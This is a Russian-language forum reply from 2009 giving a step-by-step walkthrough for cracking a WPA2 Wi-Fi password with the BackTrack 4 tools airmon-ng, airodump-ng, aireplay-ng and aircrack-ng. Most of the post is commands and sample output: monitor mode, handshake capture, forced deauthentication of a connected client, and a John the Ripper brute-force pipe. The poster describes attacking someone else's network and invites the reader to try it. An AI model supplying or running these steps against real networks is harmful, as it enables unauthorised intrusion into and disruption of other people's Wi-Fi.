Показать сообщение отдельно

  #6  
Старый 19.05.2009, 22:45
Semby68
Познающий
Регистрация: 24.03.2009
Сообщений: 43
Провел на форуме:
110385

Репутация: 22
По умолчанию

Цитата:
Сообщение от razb  
Статьи почитать не судьба?

есть кое что ! но это с ВТ-4 , сам пробую WPA взломать но пока в ожидании , у парня сетка висит WPA а рядом больше ничего нет , так вот уже вторые сутки ВТ-4 крутит, и пока ожидаем результат, по словарям её не вскрыли ,пробуем то что есть в самом ВТ-4.

если хочешь попробуй !

скачай ВТ-4 ISO и залей на USB или на CD .

Вход в ВТ-4 Login # root дави Enter

# toor дави Enter

# startx дави Enter

Переводишь карту в режим мониторинга.

команды которые отпишу закинь в блокнот и блокнот скинь на USB . но когда начинается загрузка ВТ-4 USB должно сразу стоять в компе иначе его не откроешь
потом ищи его системе ВТ-4 если не знаешь как ,то просмотри весь ВТ-4 я думаю что найдёшь.

Не забудь о правильном копирование или создании команд , иначе Default

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]



root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet


Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: остановить клавиши Ctrl +C , нажать обе.

и запускаем заново

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)


root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv


Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.


root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

вроде всё так , пробуй , может повезёт . удачи !!!
 
Ответить с цитированием